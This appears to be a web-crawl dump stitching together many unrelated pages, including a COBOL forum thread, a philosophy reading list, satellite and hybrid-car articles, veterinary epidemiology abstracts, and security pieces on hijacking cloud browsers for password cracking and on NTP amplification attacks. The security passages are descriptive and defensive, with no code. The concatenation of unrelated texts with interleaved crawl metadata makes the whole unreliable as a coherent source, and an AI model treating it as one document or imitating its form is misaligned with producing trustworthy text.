Diffie, CSO at Sun Microsystems and a Sun fellow, said the initial zeal that he and the other pioneers of digital cryptography had led to a mistaken belief that their discoveries would make data completely secure.
"I think cryptography will always just be one of the pieces," Diffie said. "The worst you can say is that public-key cryptography has been a great success." | <urn:uuid:a49146f6-0c91-4c90-9321-dcc50b526f1e> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280096243/Cryptographers-Panel-Forefathers-still-eager-for-new-advances | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00389-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.979872 | 610 | 3.078125 | 3 |
What is the necessary to use all division in COBOL..
Is any rule or standard of COBOL program..
Actually i cant understant the concept behind the division why should include all the divisions in COBOL program while writing it..
Joined: 23 Nov 2006 Posts: 19270 Location: Inside the Matrix
At the top of the page where you are reading this, there is a "Manuals" link. Click on that link and the first 6 manuals linked are for current versions of COBOL. Click on the Language Reference or the Programming Guide for the version of COBOL your system uses.
Information about divisions will be very similar in all 3 sets.
If you find something that is not clear, post it here with your question about what is not clear to you. | <urn:uuid:25e8657f-b3b4-4934-abb8-5dbde221c7bf> | CC-MAIN-2017-04 | http://ibmmainframes.com/about23994.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00141-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903067 | 165 | 3.03125 | 3 |
Originally published December 28, 2012
Okay, I’ll admit it. I used Wikipedia to look up things for my book, Socrates Reloaded: The Case for Ethics in Business and Technology. Wikipedia is good at and meant for getting a first impression of a subject to see if it is worth further studying. I also used Google, searching for popular and academic pages and papers that helped clarify complex topics and arguments. Who doesn’t? The moment some part of my book captures your attention, these are great ways to start learning more, as you probably do daily in your own work and activities.
What is missing from Wikipedia, Google and most other web resources is a rich context that makes you understand the bigger picture. How can trends in philosophy be explained as a reaction to other trends? How did the various philosophers influence each other? What place do certain philosophies have as a product of their time in history? These are not questions that are easily answered by browsing around. They require richer sources.
Following is a very small selection of sources I used in writing Socrates Reloaded. I selected the ones that would be the most interesting for those readers who’d like to delve a little deeper. From there, dear reader, I am sure you will find your own way through a lifetime of learning.
Stanford Encyclopedia of Philosophy and the Internet Encyclopedia of Philosophy
These are the best Web resource that I have found. They are comprehensive, both in breadth and in depth. As there are many contributing entries, some are easier to read than others. But overall, this has become my first go-to place if I want to understand a new topic in philosophy.Justice – Michael Sandel
Harvard University’s main philosophy professor, Michael Sandel, has put a complete series of lectures on YouTube. These lectures are full of humor, student interaction and amazing insights. Watching all of them helped me prepare for a number of themes in the book. Most of what is discussed in the series is also part of Sandel’s book, called Justice. This book is one of the few in-depth philosophy books I read with contemporary examples, and it is really fun to read.The History of Philosophy – Brian Magee
Probably the best place to start to get a quick overview of the complete history of philosophy is Brian Magee’s book, The History of Philosophy. Abundantly illustrated, it captures the essence of most schools of thought, from the old Greeks and Chinese to twentieth century philosophy.History of Western Philosophy – Bertrand Russell
However, if you are in for some serious reading, the best overview that I have read so far is Bertrand Russell’s History of Western Philosophy. Russell, a renowned 20th century philosopher himself, argues that if the old philosophers claimed universal truth on a number of issues, it is perfectly okay to challenge those truths with the knowledge and progress of today. Russell doesn’t hold back and doesn’t accept the “you have to see the work of the old philosophers in the light of the world in which they lived back then” excuse. As a famous philosopher himself, Russell presents both a thorough overview and takes position himself. He has skin in the game.Philosophy for Dummies – Tom Morris
Don’t laugh. This is a very good general overview of philosophy. For dummies? Hardly. It takes extreme skill to describe various philosophical schools of thought in plain and simple terms, without losing the essence of them. A definite must-read. It has been an inspiration for me to learn how to boil down complex discussions to the essence.Moral Theory, An Introduction – Mark Timmons
In studying philosophy, it won’t take you long to identify the topics that resonate most with you. For me, the topics were ethics and moral theory as bits and pieces of political philosophy. Not the easiest of books to read, Moral Theory provides a thorough overview of all schools of thought in this area.Contemporary Political Philosophy – Will Kymlicka
Kymlicka’s book is considered the standard overview on political philosophy. Again, it’s not the most entertaining of reads, but it does provide a good overview. Kymlicka focuses on comparing and contrasting different schools of thought, instead of describing them independent from each other.Examined Lives – James Miller
We are all the product of our time. Even some of the great philosophers had trouble overcoming the shortcomings of their own paradigms. For instance, Hegel reasoned that the 18th century Preusian form of government truly presented the ideal state. James Miller doesn’t describe the various philosophies in different ages; he describes the lives of the philosophers against the backdrop of the time and place where they lived. The title is a very appropriate reference to a famous quote from Socrates: “The unexamined life is not worth living.”
Not really a book that has a story line or a clear logic in argument, The Art of War is more of a collection of short lessons and statements. Very relevant for today’s business nevertheless.The Prince – Machiavelli
Who would think a 16th century book could be an entertaining read. Machiavelli’s The Prince certainly is. Unlike most other philosophers, Machiavelli doesn’t describe how things should be, but how they work in practice. It seems many lessons of power and leadership apply as much in the 16th century as they do now.The Republic – Plato
If you are in search of wisdom, I am afraid none of these books will provide the definitive answer. But that shouldn’t stop you. Starting with one or a few of these books can be a humbling experience. They may teach you how you can stand on the shoulders of giants. They may tell you where you stand so you know that your point of view is not unique. It is probably discussed (and rejected by others) on a much deeper level than you could do yourself. These books may also greatly help you framing, contextualizing and sharpening your thoughts so you can better reflect. And that may very well be the beginning of wisdom.Most of Plato’s work is written in the form of dialogue, often featuring his master Socrates. It is unclear if Plato is putting his own words in Socrates’ mouth, or is truly representing Socrates’ view. Many English translations have copious footnotes and elaborate side descriptions to explain what Plato is telling us through the dialogues, giving both the pleasure of the dialogue and a thorough background.
Recent articles by Frank Buytendijk | <urn:uuid:6f655324-f48f-422f-87ee-d78dfd464c7e> | CC-MAIN-2017-04 | http://www.b-eye-network.com/channels/5567/view/16772 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00049-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951266 | 1,351 | 2.640625 | 3 |
Primary instrument ready for GOES-R installation
- By Frank Konkel
- Nov 04, 2013
The Advanced Baseline Imager is one of six primary, state-of-the-art instruments developed for the National Oceanic and Atmospheric Administration’s next-generation geostationary satellites.
One of six primary, state-of-the-art instruments developed for the National Oceanic and Atmospheric Administration’s next-generation geostationary satellites has been cleared for installation.
The Advanced Baseline Imager (ABI), developed by Exelis, will be shipped from Indiana to Lockheed Martin Space Systems in Colorado to be installed on the first Geostationary Operational Environmental Satellite (GOES-R), which is expected to launch in early 2016.
ABI is GOES-R’s primary instrument for scanning the planet’s weather, oceans and environment, offering faster imaging at higher resolutions than current space-based technology. The instrument also offers NOAA new forecast products for severe weather, volcanic ash advisories, fire, smoke monitoring and other types of hazards.
“The United States is home to some of the most severe weather in the world, including tornadoes, hurricanes, snowstorms, floods and wildfires,” said Mary Kicza, assistant administrator for NOAA’s Satellite and Information Service. “The ABI offers breakthrough technology that will help NOAA develop faster and more accurate forecasts that will save lives and protect communities.”
Despite a series of delays, the latest of which pushed the launch date from October 2015 to sometime in the first quarter of 2016, instrumentation development is on target for GOES-R. The spacecraft’s first instrument, the Extreme X-Ray Irradiance Sensor (EXIS), was completed in May 2013. It will provide scientists on the ground advanced warning of solar storms.
The remaining planned GOES-R instruments are:
- Geostationary Lightning Mapper, which will provide for the first time a continuous surveillance of total lightning over the western hemisphere from space.
- The Space Environment In-Situ Suite, which consists of sensors that will monitor radiation hazards that can affect satellites and communications for commercial airline flights over the poles.
- The Solar Ultraviolet Imager, a high-powered telescope that observes the sun, monitoring for solar flares and other solar activity that could affect Earth.
- The Magnetometer, which will provide measurements of the space environment magnetic field that controls charged particle dynamics in the outer region of the magnetosphere. These particles can be dangerous to spacecraft and human spaceflight.
Frank Konkel is a former staff writer for FCW. | <urn:uuid:4d03f3f9-5dbf-46a3-a15f-935eac53e7dd> | CC-MAIN-2017-04 | https://fcw.com/articles/2013/11/04/noaa-abi-on-track.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00353-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902844 | 548 | 2.625 | 3 |
Researchers from North Carolina State University and the University of Oregon show how hackers can anonymously hijack computing power from cloud-based Web browsers.
Cloud-based browsing is intended to boost the performance of low-power devices, like mobile phones and tablets, by offloading the bulk of the computation to remote servers. However, by exploiting design vulnerabilities inherent in some cloud browsers, cyber-thieves can create a virtual compute farm dedicated to unlawful activities, like password cracking and denial of service attacks.
A new research paper, Cloud-Based Browsers for Fun and Profit, describes the parasitic computing ploy in detail. Considering the powerful capabilities of today’s cloud browsers, the researchers wondered: “Was it now possible to perform arbitrary general-purpose computation within cloud-based browsers, at no cost to the user?”
A technique called Browser MapReduce (BMR) is used to explore the computation and memory limits of four cloud browsers, Amazon Silk, Opera Mini, Cloud Browse and Puffin. BMR is based on Google’s MapReduce framework for the parallel processing of large datasets.
The researchers developed and tested three canonical MapReduce applications – word count, distributed grep, and distributed sort. A URL shortening service was used to pass large packets of data between nodes. The computations were completed successfully, but due to ethical considerations, packet sizes were kept to 100 MB or less. Researcher and co-author, Dr. William Enck, an assistant professor of computer science at NC State, suggests that the same applications could be carried out using much larger datasets, they just didn’t want this academic exercise to pose an undue burden to the systems they were using.
Based on their findings and observations, the authors conclude that “the computational ability made freely available by cloud browsers allows for an open compute center that is valuable and warrants substantially more careful protection.”
As one example of the potential for misuse, they simulated a password cracking implementation and found that with Puffin, 24,096 hashes could be generated per second for a total of 200 million per job.
The paper provides several recommendations aimed at improving the security of cloud-based browsers.
1. Providers should place resource limitations on rendering tasks.
2. Because a framework such as BMR can link jobs to create a computation grid, providers should also rate limit connections from mobile clients. One way to do this is to require users to create accounts, and place rate limits on authenticated users.
3. To help reduce the ability to clone instances, the browser could require registration and use a device-specific private key as part of its handshake protocol with the cloud-based renderers. The Amazon Silk browser already does this.
4. Techniques such as CAPTCHAs can limit the rate of creating new accounts.
The paper will be presented this Thursday at the Annual Computer Security Applications Conference in Orlando, Fla. | <urn:uuid:01beab88-1e59-4c03-86fc-eb5a16beef20> | CC-MAIN-2017-04 | https://www.hpcwire.com/2012/12/03/cloud_browser_hack_exposed/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00471-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9301 | 602 | 2.96875 | 3 |
Assessing risks from vehicular crashes is part of designing an outdoor perimeter solution. In this article, David Dickinson, Senior Vice President of Delta Scientific, discusses some of the issues that need to be taken into consideration for a secure yet aesthetic perimeter.
Keeping pedestrians safe, protecting structures from accidental or intentional automobile crashes, and force protection (keeping employees and visitors from harm) have always been a concern. From pedestrian-filled farmers markets and universities to new-and-used car lots, a wide variety of agencies find peace of mind through the use of barriers, bollards, barricades and crash gates for vehicle-based physical access control at the perimeter.
Risk Assessment Starts With Physics 101
When evaluating the security risk for a given facility, particular attention must be focused on the weights and velocities of vehicles that would be used to attempt penetration into sensitive areas.
A vehicle moving towards a barricade has a certain kinetic energy, which is the major measure of how much "hitting power" it possesses. Mathematically, kinetic energy is derived from the vehicle velocity and its weight (mass). On impact, some of this energy is converted to heat, sound and permanent deformation of the vehicle. The barricade must absorb the remainder of this energy if the vehicle is to be stopped.
The amount of remaining energy varies depending on many factors, primarily the velocity of the vehicle at the moment of impact. The amount of kinetic energy posed by a vehicle changes as the square of its velocity. For example, a vehicle moving at 50 mph (80 kph) has 25 times as much kinetic energy as it would at 10 mph (16 kph). Thus, an armored car weighing 30 times as much as a Toyota Corolla and moving at 10 mph (16 kph) would have less hitting power than the Toyota moving at 60 mph (96 kph)!
Because of the relationship of velocity to the total kinetic energy possessed by the vehicle, every effort must be made by the security engineer to force a vehicle to slow down before it reaches the barricade. The most frequently used technique is to require a sharp turn immediately in front of the barrier. When vehicle speed is reduced by 50 percent, the "hitting power" is reduced by four times. If the speed is reduced by two-thirds, the force of impact will be reduced by nine times.
Upon designing a way to slow down vehicle approach, precautions should also be taken that the attacking car cannot make a "corner cutting shot" at a barricade. Often, only a light post defines a turning point and a speeding car can take it out and not even hesitate. Knolls and other impediments should be considered.
Failing to understand this and not using the proper equipment to counter the threat may lead to a false sense of security.
Where turns cannot be created, many are turning to an Early Warning System. This system is best applied at locations where there is a long and relatively straight run into the facility that would allow a large vehicle to build up its speed. A vehicle traveling at 60 mph (96 kph) can cover 88 feet per second (2.68 m/sec) so it is imperative that the guards be alerted immediately.
Continuous Doppler radar picks up instantaneous changes in velocity and addresses the threat scenario in which an inbound vehicle approaches at normal speeds and then accelerates to commence the attack. It will also send a warning if a hidden vehicle suddenly passes a larger vehicle and attempts an attack. Once alerted, the guards can take action, including raising the barrier systems.
Overcoming Common Design Deficiencies
As discussed above, linear thinking will not get you very far when planning a vehicular perimeter security system. Straight lines make for faster and easier approaches for vehicles, so it is best to create curves on the access roads to your facility as a natural impediment to speeding cars or trucks.
Another common planning deficiency occurs when designers choose noncertified barriers or barricades. Certified equipment has been tested and proven to work under extreme conditions, giving planners the confidence they rely on. No area is more critical to the vehicle barrier selection process than testing. Without adequate testing, there is no assurance that the barrier will resist the threat. Testing is normally by an independent testing company or government agency, such as the U.S. Department of State (DoS) and military. Comprehensive reports of test results are issued and are available from the testing agency or manufacturer.
Today's barriers and bollards are capable of stopping and destroying a truck weighing up to 65,000 pounds (29,454 kg) and traveling at 50 mph (80 kph). Such barricades can be raised or lowered at will to stop traffic or let it through. In an emergency, the thick steel plates or bollards pop out of the ground within 1.5 seconds.
When integrated properly into a total system, including fences, lights, alarms, gates, and other security components, vehicle barriers are a key measure in preventing threats to sensitive resources. It is important to consider supplemental gate and fencing reinforcements that might be needed to optimize vehicle barrier effectiveness.
In designing a barrier system, you must also consider whether to use a passive or active system. Normally, an active system keeps the barrier in the active or up position. It must be deactivated to permit access. Active systems are preferable to ones that must be activated to prevent access because they are more secure.
One final area that should not be overlooked is aesthetics. With today's smart designs, it is no longer necessary to choose between form and function. You can have them both. Designers are creating secure environments with more compatible and aesthetically pleasing architectural elements.
If you visit the U.S. Capitol today, for example, you will see landscaped islands at the north and south entrance drives which regulate vehicular access. If allowed to drive into the Capitol complex, you will cross over vehicle control barriers and bollards at the entrances. Indeed, all exits at the end of all drives are controlled with barriers, which pop from the ground when needed.
You will see similar barriers and bollards at refineries, distribution centers and headquarters offices of petrochemical and hydrocarbon companies, literally around the world.
Putting New Vehicular Threat Tactics on the Defensive
By their very nature, terrorist attacks are unpredictable and predicated on surprise. Staying one step ahead by identifying vulnerable areas, and securing them, is critical to staving off vehicular attacks.
That means being able to deploy security equipment in tough conditions, at a moment's notice. Fortunately such equipment now exists in the form of portable and towable temporary barriers. These barriers can be deployed quickly and effectively, even in places where it is impossible to excavate for a permanent foundation, such as the streets of Paris.
Terrorists typically do not go where they see barricades, so placing them wherever possible attacks can happen reduces security risks dramatically. Temporary barriers can protect facilities while permanent ones are being built, and they are even effective for the long-term where physical conditions preclude permanent solutions.
There are many types of available portable barriers and barricades:
Drop arm barrier
Able to be deployed or relocated for full manual or automatic operation within two hours, these quick deployment barriers will stop and destroy a 15,000 pound (6,800 kg) truck traveling at 30 mph (48 kph) in less than 20 feet (5.5 m). They secure an entrance roadway eight to 24 feet (3.2 9.6 m) in width from vehicle attack. Hydraulic and manual versions are available.
Portable plate barricades
Portable plate barricades provide security against vehicle-based terrorism or thefts for high-cycle locations such as the entrances to large office facilities, government agencies and military bases. Able to be deployed in high traffic locations for full manual or automatic operation within two hours, the quick deployment modular barricades feature a phalanx-type rising plate barrier mounted within multiple inertial pods.
The plate barrier lies level to the ground to allow vehicles to pass and is raised or lowered into position utilizing a hydraulic cylinder driven by a hydraulic power unit. The hydraulic pumping unit can be sized to provide pass-through rates suitable for most inspection and identification station requirements.
Towed portable crash barriers
Able to be deployed in 10 to 15 minutes, the newest portable high security vehicle crash barriers can quickly protect facilities and people from vehicle attacks and accidents. Some mobile crash barriers can be towed into position by a golf cart. The mobile barriers operate locally or remotely for guard protection.
Deployment, retrieval and operation are all hydraulic. The barriers stop and disable a 15,000-pound (6,818 kg) vehicle moving at 30 mph (48 kph). These portable crash barriers were built for U.S. federal government security specialists wanting a system that could be rapidly deployed and then operated as a regular security gate or barrier system. Once positioned, the mobile barricade is separated from its transporter and lowered into position by means of a batteryoperated hydraulic power system, which is then used to raise or lower the barrier for normal or emergency tasks. Commercial versions are just as well-suited for protecting a farmer's market and other business events from errant drivers. Light enough to be towed by a golf cart and set up in only 10 minutes, the DSC 1000 portable barrier passed an ASTM crash test, stopping a 5,000-pound (2,300 kg) vehicle going 40 mph (64 kph), providing it with an ASTM rating of P40.
Contrary to the "hard stop" wanted with antiterrorist crash-tested barricades, testing of the new DSC 1000 demonstrated that the collision did not distort the passenger compartment of the vehicle. Instead, Soft Stop technology decelerates and stops the vehicle over a short distance, referred to as "occupant ride down acceleration." This protects the errant driver as well as pedestrians.
Permanent Barriers and Barricades
From parking lot security to stopping vehicles access at refineries, there are a variety of suitable barricades available. Solutions include high-security surface mounted barricades, cable beam barricades, high security barriers and very high security, shallow foundation barriers. High security barriers are all crash rated in widths up to 288 inches (732 cm) and up to 38 inches (96.5 cm) high. Lowered to allow passage of authorized vehicles, these barriers are the first line of defense at critical facilities.
High-security surface mounted barricades allow quick installation into difficult locations such as parking structure ramps or areas with subsurface drainage problems. These crash-rated barricades are lowered to allow passage of authorized vehicles and are available in widths up to 288 inches (732 cm).
Very high security, shallow foundation barriers are available for advanced counter-terrorism applications in subsurface conditions that negate extensive excavations. This type of barricade was designed for the U.S. Navy. Set in a foundation only ten to 18 inches (25.4 45.7 cm) deep, these shallow foundation barriers are able to survive and operate after a 1.2 million-foot-pound impact. With its shallow foundation and aesthetic design, they are major breakthroughs in high duty, antiterrorist barricades.
The shallow foundation barriers eliminate concerns about interference with buried pipes, power lines and fiber optic communication lines. The shallow foundation also reduces installation complexity, time, materials and corresponding costs. These types of barriers are suitable for high water table locations and areas with corrosive soils.
Cable beam barricades are available in hydraulic and manually operated models. All are crash rated with one version enhanced for higher security applications. The clear openings range from 10.5 to 24 feet (4.2 9.6 m). One model is configured as a swing gate for use where vertical lift is impractical. All other models are raised to allow passage of authorized vehicles.
Bollards Are BuffAnd Beautiful
When looking for a bollard solution, you choose the level of security you need. From protecting a headquarters to a warehouse or even a parked tanker, you can find a bollard system that will meet your needs.
With a foundation only 14 inches (35.5 cm) deep versus the four feet (1.2 m) typically required, the new DSC 600 Fixed Shallow Foundation Bollards can be installed within sidewalks, on top of concrete deck truss bridges or in planters as well as conform to the inclines and turns of a locale. The new two-bollard modules, which can be arrayed in whatever length is required, will stop and destroy a 15,000-pound (66.7 kN) truck traveling 50 miles per hour (80 kph).
They have already successfully passed a K12 rating crash test, providing proof of their ability to provide high-energy stops. It is the first Shallow Foundation Bollard to meet the U.S. Department of State Specification, Revision A, that requires the bed of the attacking truck to go less than 39 inches (1 m) beyond the point of impact.
Bollard systems that raise or lower can operate individually or in groups up to 10 and are used for intermediate level security applications. Individual bollards are up to 12.75 inches (32.39 cm) in diameter, up to 35 inches (88.9 cm) high and are usually mounted on 3 to 5 foot (1.2 2 m) centers. Hydraulic versions can be operated by a variety of control systems. Manual versions are counter balanced and lock in the up or down position. All models are crash rated and lower to allow passage of authorized vehicles.
They are tested to stop and destroy an attacking vehicle weighing 10,000 pounds (4,545.5 kg) moving at 65 miles per hour (104 kph) or a 20,000-pound (9,091 kg) vehicle moving at 46 miles per hour (73.6 kph).
With bollards, you can create the look you want. Ranging from faceted, fluted, tapered, rings and ripples, colors, pillars, to shields, emblems and logos, bollards are aesthetically pleasing and versatile. You can specify ornamental steel trim attached directly to the bollard, or select cast aluminum sleeves, which slip over the crash tube. Bollards can be galvanized for corrosion resistance, fitted with an internal warning light for increased visibility and engineered to suit high traffic volume. If the bollards are damaged, simply slip off the old and slip on the new.
No Application Too Large or Small
Protecting perimeters of facilities is no small responsibility. Knowing you have got the right equipment in place to secure a facility and to prevent human tragedy brings a peace of mind that no amount of money can buy. Carefully researching available options and consulting with experts will ultimately lead to the right solution. | <urn:uuid:f000d620-2b36-4dce-8f60-9fa5ccdc75b7> | CC-MAIN-2017-04 | https://www.asmag.com/showpost/5350.aspx?pv=3 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00106-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93428 | 3,053 | 2.90625 | 3 |
Computer on WheelsBy Mel Duvall | Posted 2005-08-04 Email Print
Strong sales of Toyota's Prius hybrid vehicles could be threatened by software malfunctions that leave drivers stuck in traffic.
At its heart, the Prius is a computer on wheels. After slipping into the driver's seat, the owner simply pushes a button on the dash-much as you might press the On button on a computerand the vehicle powers up. This technology is often referred to as drive-by-wire, as there are no traditional cables, hydraulic lines or linkages connecting the gas pedal to the engine, the brake pedal to the brakes, or the stick shift to the transmission. If the car is in Park or Neutral and you press down on the gas pedal, the engine will not race as it would in a normal car, because the computer determines there is no purpose in doing so.
A touch-sensitive console located in the center of the dashboard provides access to a number of features, such as radio settings and climate controls, as well as updates on the vehicle's performance. The screen shows, for example, a graphic representation of the power flow from the electric motor or gas engine in the hybrid system, and the average miles per gallon achieved over the last 5 minutes and 30 minutes.
Virtually every major subsystem of the vehicle, from the electric motor to the gas engine and battery-pack system, has its own electronic control unita computerto control and direct operations. The major electronic control units in turn communicate with one another over a high-bandwidth network. And orchestrating the entire operation is the hybrid ECU.
In action, it works like this: When initially pulling away, or driving at low speeds, the vehicle is powered by its electric motor. As the car picks up speed, the hybrid electronic control unit instructs the vehicle's gas engine to turn on and provide additional acceleration. The torque from the two motors is managed through a power splitting device called an electronic continuously variable transmission. At high speeds, the car runs primarily on the gas engine, which also recharges the vehicle's battery.
The combined systems give the Prius outstanding fuel mileage60 miles per gallon in the city and 51 on the highway, as estimated by the Environmental Protection Agency. (Unlike conventional vehicles, the Prius gets better fuel mileage in the city because it can drive more often on the electric motor.)
Its complexity, however, not only prevents most owners from tinkering under the hood, but has also been a concern for the automotive repair industry in general. "One look under the hood will scare you," says Craig Van Batenburg, owner of the Automotive Career Development Center in Worcester, Mass., which specializes in training independent garages on repairing vehicles. "They're more complicated, there are more computers, more sensors, and everything's packed in so tightly."
And they can be dangerous. Power to the Prius' electric motor is supplied by a 276-volt battery pack. The average person can be killed by a 60-volt shot to the pants. Van Batenburg says safety measures are more critical than ever with the hybrids, but the independent repair industry has to learn how to handle hybrids or risk losing an increasing share of business to the dealerships.
The average car owner probably isn't aware of how software updates even get into his vehicle. On most cars, a dongleor data portis installed just below the lower left side of the steering wheel. When the car is brought into the repair shop, a mechanic connects to the port and runs a set of diagnostic tests. The technology is a god-send for mechanics, according to Van Batenburg. "When the check-engine light comes on, it could be one of 600 things going wrong," he says. "Without the computer systems, it could take days to pinpoint a problem."
Updating the software in the Prius, or any other vehicle, is a relatively simple process. Most shops now provide mechanics with wireless laptop computers. The mechanic uses the laptop to go to a secured Web site provided by the manufacturer, and downloads the latest software update to the laptop. From there, it gets passed through the data port to the flash memory in the vehicle.
The Prius stalling problem may turn out to be minor. In fact, Van Batenburg speculates that a number of the incidents could simply be a result of owners trying to squeeze every bit of mileage they can out of a tank of gas and eventually hitting empty. (A number of Prius owners posting in online forums have insisted their tanks were not empty; Len says her car had plenty of gas left when it stalled.) However, it is also just as possible that the problem could be widespread and will result in a recall.
In the meantime, it doesn't appear to be affecting the vehicle's sales. Toyota says it sold 9,622 Prius vehicles in the U.S. in June, at the height of attention over the software flaw, a 119% increase over the previous year. In the first six months of 2005, gas-priced-gouged consumers snapped up 53,310 of the $20,000 vehicles, compared to 21,890 in the first six months of 2004.
Owners like Len say they're not bothered by the increasing amounts of software in their vehicles and, in fact, can't wait for more innovations and software-driven features to be added to the Prius. But they want Toyota and all manufacturers to get it right.
"The computer techs, engineers and designers need to step up to the plate and fine-tune their craft," Len says. "Frankly, I hope I live long enough to own a flying car with whatever new technology is available to run it."
Software Bugs Threaten Toyota Hybrids | <urn:uuid:da021dd0-afd0-42c3-8e81-f08e3c2f9d5b> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/Projects-Processes/Software-Bugs-Threaten-Toyota-Hybrids/2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00408-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957635 | 1,182 | 2.96875 | 3 |
NTP, network time protocol, is a time synchronization protocol that is implemented on a network protocol called UDP. UDP is designed for speed at the cost of simplicity, which plays into the inherent time-sensitivity (or specifically, jitter sensitivity) of NTP. Time is an interesting scenario in computer security. Time isn’t exactly secret; it has relatively minor confidentiality considerations, but in certain uses it’s exceedingly important that multiple parties agree on the time. Engineering, space technology, financial transactions and such.
At the bottom is a simple equation:
denial of service amplification = bytes out / bytes in
When you get to a ratio > 1, a protocol like NTP becomes attractive as a magnifier for denial of service traffic.
UDP’s simplicity makes it susceptible to spoofing. An NTP server can’t always decide whether a request is spoofed or not; it’s up to the network to decide in many cases. For a long time, operating system designers, system implementers, and ISPs did not pay a lot of attention to managing or preventing spoofed traffic. It was and is up to millions of internet participants to harden their networking configuration to limit the potential for denial of service amplification. Economically there’s frequently little incentive to do so – most denial of service attacks target someone else, and the impact to being involved as a drone is relatively minor. As a result you get systemic susceptibility.
My advice is for enterprises and individuals to research and implement network hardening techniques on the systems and networks they own. This often means tweaking system settings, or in certain cases may require tinkering with routers and switches. Product specific hardening guides can be found online at reputable sites. As with all technology, the devil is in the details and effective management is important in getting it right. | <urn:uuid:54cc8831-88f8-4897-b0a9-89e2463e7535> | CC-MAIN-2017-04 | https://labs.neohapsis.com/2014/02/12/on-ntp-distributed-denial-of-service-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00408-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927683 | 378 | 3.390625 | 3 |
Ducrot C.,French National Institute for Agricultural Research |
Sala C.,AFSSA Lyon |
Ru G.,Italian Reference Center for Animal |
De Koeijer A.,CVI |
And 6 more authors.
European Journal of Epidemiology | Year: 2010
BSE is a zoonotic disease that caused the emergence of variant Creuzfeldt-Jakob disease in the mid 1990s. The trend of the BSE epidemic in seven European countries was assessed and compared, using Age-Period-Cohort and Reproduction Ratio modelling applied to surveillance data 2001-2007. A strong decline in BSE risk was observed for all countries that applied control measures during the 1990s, starting at different points in time in the different countries. Results were compared with the type and date of the BSE control measures implemented between 1990 and 2001 in each country. Results show that a ban on the feeding of meat and bone meal (MBM) to cattle alone was not sufficient to eliminate BSE. The fading out of the epidemic started shortly after the complementary measures targeted at controlling the risk in MBM. Given the long incubation period, it is still too early to estimate the additional effect of the ban on the feeding of animal protein to all farm animals that started in 2001. These results provide new insights in the risk assessment of BSE for cattle and Humans, which will especially be useful in the context of possible relaxing BSE surveillance and control measures. © 2010 Springer Science+Business Media B.V. Source
Fediaevsky A.,French National Institute for Agricultural Research |
Calavas D.,AFSSA Lyon |
Gasqui P.,French National Institute for Agricultural Research |
Moazami-Goudarzi K.,French National Institute for Agricultural Research |
And 4 more authors.
Genetics Selection Evolution | Year: 2010
Background: Since 2002, active surveillance programmes have detected numerous atypical scrapie (AS) and classical scrapie cases (CS) in French sheep with almost all the PrP genotypes. The aim of this study was 1) to quantify the genetic risk of AS in French sheep and to compare it with the risk of CS, 2) to quantify the risk of AS associated with the increase of the ARR allele frequency as a result of the current genetic breeding programme against CS. Methods. We obtained genotypes at codons 136, 141, 154 and 171 of the PRNP gene for representative samples of 248 AS and 245 CS cases. We used a random sample of 3,317 scrapie negative animals genotyped at codons 136, 154 and 171 and we made inferences on the position 141 by multiple imputations, using external data. To estimate the risk associated with PrP genotypes, we fitted multivariate logistic regression models and we estimated the prevalence of AS for the different genotypes. Then, we used the risk of AS estimated for the ALRR-ALRR genotype to analyse the risk of detecting an AS case in a flock homogenous for this genotype. Results: Genotypes most at risk for AS were those including an AFRQ or ALHQ allele while genotypes including a VLRQ allele were less commonly associated with AS. Compared to ALRQ-ALRQ, the ALRR-ALRR genotype was significantly at risk for AS and was very significantly protective for CS. The prevalence of AS among ALRR-ALRR animals was 0.6 and was not different from the prevalence in the general population. Conclusion: In conclusion, further selection of ALRR-ALRR animals will not result in an overall increase of AS prevalence in the French sheep population although this genotype is clearly susceptible to AS. However the probability of detecting AS cases in flocks participating in genetic breeding programme against CS should be considered. © 2010 Fediaevsky et al; licensee BioMed Central Ltd. Source | <urn:uuid:b48e1873-15c9-4915-9198-1decca43ed66> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/afssa-lyon-2034313/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00160-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922552 | 796 | 2.59375 | 3 |
Technology, with all its promise of time and cost savings, is often considered a panacea for the ills of our age – whether at the corporate, societal or personal level. I recently participated in a discussion about how technology might resolve an alarming trend in developed nations: the steady decline in voter turnout. (Just one vivid example: turnout among registered voters in the most recent U.S presidential election – 2008 – was a meager 63%.)
Using the Internet for online voting seems like a perfect way to increase participation in the democratic process. It is much easier for computer savvy societies to vote online rather than face the crowds and long lines at physical polling places. And with the recent explosion in numbers of portable devices with mobile Internet connectivity, you’d expect a large share of the US population to have the access necessary for such a plan.
Unfortunately, the reality is that there is no existing authentication mechanism currently deployed to the citizenry that is even remotely tamperproof. Before there can be a serious debate on the topic of online voting there would need to be a unique, modern citizen ID card. Such cards would need to incorporate the use of smartcard technology combined with military level encryption and authentication technologies. Today’s mobile devices simply won’t be compatible with these types of cards.
